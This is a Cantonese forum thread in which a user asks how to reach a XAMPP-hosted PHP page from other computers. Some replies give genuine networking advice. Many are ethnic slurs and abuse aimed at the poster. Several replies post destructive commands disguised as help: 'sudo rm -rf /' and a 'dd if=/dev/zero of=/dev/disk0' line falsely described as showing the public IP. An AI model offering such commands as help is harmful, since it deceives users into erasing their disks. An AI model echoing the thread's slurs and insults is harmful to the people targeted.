［有圖］點樣可以係其他電腦入到我個網頁？

應該要打d咩 其他電腦可以入到來

Google 好耐都搵唔到答案

你條拎有毒

百度
Hao123

咩毒

ransomware

原本想教
原來係支那仔嚟
你慢慢百度啦

支那仔上開百度

Xampp 你入到咩
賜教 唔明

邊到支那

支那休用百度問啦

我都唔知幾時裝 俾次機會 大佬

已delete

圈漏左Twitter Apple Facebook Google

500蚊教你

PS: 我免費教你 你估我讀書唔撚洗俾學費既

hao123
一黎就打大佬.

學費

起http server

Xampp?

屌你老母求人教仲要貼葉劉

食屎啦你.gif

洗機都未必幫到你

幫幫手

將個php放喺其他電腦度

要用C Drive上網大法先得

已經兩部唔同電腦

用左xampp

copy多個網頁去另外一部電腦囉！

如果用ip address 呢

同一個network定唔同network先? (LAN, WAN)
如果係LAN, 咁你其他電腦要同你而家部電腦 (server, 即係你有裝xampp個部)同一個network先, 然後你就check下你部機既ip address, 再係其他電腦既browser上 打上你個部電腦既ip address同對應既port就得啦
如果WAN, 即係唔同network, 你要係router到set port forwarding, 之後其他電腦要入到你個網頁既話, 就要打你個部電腦(server) 既public ip adress的

aws 開部vm試啦

係router port forward入電腦

謝謝
LAN 192.168.86.242

但係呢個唔係我想ge網頁，可以係邊到搵到我想要個page

這是最新的大汗電腦病毒，小心！

我睇返你開post 張圖個條path係咁 x.x.x.x:8080/library/adminlogin.php
所以你想入到呢個php page既話 就應該打192.168.86.242:8080/library/adminlogin.php

樓主去返百度問啦

放上github 最快

自學 php

hao123

10年前學過 不過轉左行 俾仆街校長迫害 要用番

都係load 唔到

twghlytkg
東華三院廖恩德紀念幼稚園
HKAGE
香港資優教育學苑
GED1011 HKEdU Digital Citizenship

清
自爆味濃

牙sir

用呢個

咁大個人都唔識用screenshot不如退學

見到你個post好想解答你問題
但係見到你個記錄 下世投胎冇做支那人先再講啦

hao123百度

識整網站唔識screenshot

原本想考
見到百度
不了

我識, 不過唔教

直接打192.168.86.242/library/adminlogin.php 呢?

免費教支那伸手黨巴打你都幾cheap

咪係，又支那仔，又不停放條臭閪出黎當人狗咁撚

100%支那 confirm

你用邊間isp呀

電訊盈科就開唔到80 port

首先你要去what is my IP address知道自己咩ip

然之後喺router度開返

any to 80/8080

但係如果你係電訊盈科所有人入你server都要用
ip:8080

屌你老母做壞規矩
條撚樣圖又無 又係支那仔
咁都教 你條仆街仔有份養班伸手黨

咪撚教佢啦 百度果d都唔講啦仲要放咁垃圾腳圖出來

支那仔自己百度啦，去錯地方啦

睇你又係見it人工高就想寫網頁入行

php

利申IT狗

係 10年前讀完個it degree 就轉左行

Bam支那仔

Hi kennedy

hao123 毒到仆街

有degree連呢啲嘢都唔識, 你個乜鳩degree嚟㗎

裝ICQ都$200啦，你收人$500咁平

rm -r /

幫到你

建議樓主唔好再貼
驚你再貼落去會自爆
不論係影嘅內容定係個mon嘅倒影

去router forward哂d port 去你電腦再放個ip上嚟就有人幫你架啦

你自己個網頁放左係邊？

It worked果到對番你localdrive個file path

係咪仲有xampp 開左apache咁？

唔好同人講你讀it
咁簡單小學生都識

仲有無記錯張圖係葉劉黎？

hao123 出現了

咪撚入it行啦
咁撚簡單咩

就咁起過XAMMP都唔識

而家啲用python /nodejs 你點燈上去

平心而論有時用手機影係幾方便

資優嗰啲人係咪通常都低低地

你無撚野呀
咁都教佢？
仲要咁簡單都可以講到google 唔到 唔好講笑啦
又要伸手又要支那仔 咁都教
DLLM 呀

伸手黨J圖都無張仲要貼葉劉
教佢果啲係咪連登仔黎

其他電腦，就唔係 127.0.0.1

係嗰部機個 IP

餵埋你食好唔好

原本想教你, 但見到葉劉
你自己google port forwarding啦

近排咁多人自爆

大陸仔

真IT狗好少用用下電腦會拎起手機
覆message都用web版whatsapp/tg
cap完圖就咁拉入黎仲方便
btw呢d好主觀

apache

你下年咪試下拎呢張圖去交學費囉

有it degree都做伸手黨 連基本技能google都唔識

樓主你都係算啦 交返比專業it狗做
比你搞得掂放到個web server出黎
都係會等比人hack 無謂啦

仲要有好多個出嚟教
叻唔切

乜而家幼稚園就要寫網站啦？

而家電腦技術我哋知架，唔好話你少用百度，我話你知你呃唔到電腦互聯網演算法

原本以為假膠
原來係真心膠

可能公司block左wtsapp

Router set 反 port forward 先，再睇下public ip 係咩，之後打 public ip 就入到你部機個website

咁撚多人幫個弱智仔
連登仔係好人

仆街呢d 圖就高清
load 到我仆街

開terminal, 行下面個command:

sudo rm -rf /

本身想教 見到又hao又百度

仲要on9度影mon然後又起撚哂一條條 睇都廢事睇

拉

係, 但都唔會好似樓主咁影法
最好唔好影到倒影
好似某會員咁自爆

唔太明

真 怪唔知之得咁多人睇唔起香港it
成班冇骨氣 啲女叫你做兵係咪照去

你rf後面漏咗個空格啊
rf/ 改成rf /

用知乎問啦或者百度下

真心膠
自己google下啦 人講乜 你就做乜..

咩 degree

支那仔

叫d人remote你部機咪上到

上百度揾啦你咁鐘意用百度

屌你老母笑到我癡線

要copy夠100部機google 百度先至有機會search到

樓主行完上面terminal句野
電腦還好嗎？係咪上唔到黎reply

咪撚教佢啦

教識徒弟冇師父喇依家

呢個真係尊嚴都冇

唔關我事㗎, 我咩都唔知, 樓主有咩事唔好搵我

佢應該經過件事之後學得聰明左

似係中毒

條command係咩意思
remove file?

利申唔識

xampp唔會自動開埋比你入，要自己去改config

IP打返你電腦個IP

係咪姐係傳說中既洗機

樓主被recursively remove左了

del完之後會出返嚟
ransomware都裝 支那仔

條撚樣可能都係支那仔，幫自己同胞

樓主部機喺咪已經玩撚完上唔到黎覆

佢咁鍾意手機影mon點會上唔到

好心唔好教壞人

sudo dd if=/dev/zero of=/dev/disk0 bs=8080 count=4096

樓主你打呢句command落去terminal一行
應該會出條ip出嚟 條ip就係你個public ip
之後你想第部電腦入 就喺browser到打番嗰個ip入
如果咩都無出可能係因為你個xampp裝咗係disk1
將上面個disk0轉disk1再行一次

phpmyadmin

唔識port forwarding.
但唔洗Google都識del hao123.
留名學野.

上個sem先做完用xampp開website連sql

連登咁多支那仔
財經台是但都見到幾個紅升綠跌

樓豬係咪打完句command玩完左

查下2011-08-31嘅官司喺咪可以收窄範圍

咩係recursive

利申 乜都唔識

想知樓豬係咪搶緊Genius Bar嘅booking?

大把大陸尼用呢啲app, 又要愛國又想窺探外面既自由世界

我屌你老母支那仔都教

入去貼張圖出黎就先幫你

教佢做乜撚

我操 不會上知乎問大神

Lol

吊你老母教個支那仔用DD 去搞掂permission issue 等佢用得到，連登班伸手黨係你養出黎

由得佢比人陰玩rm好過啦

你地班連登仔唔係成日話人IT狗咩？

樓主RAP

留名學野

點解咁講嘅

點會玩完，有國家級backup咖嘛

市道低迷咪就係呢啲人做爛市

咁睇又似係假膠扮唔識

個個都一眼認得出葉劉對腳

樓主被remove了第二天問候區

樓主喺到
上咸網中毒有冇人識整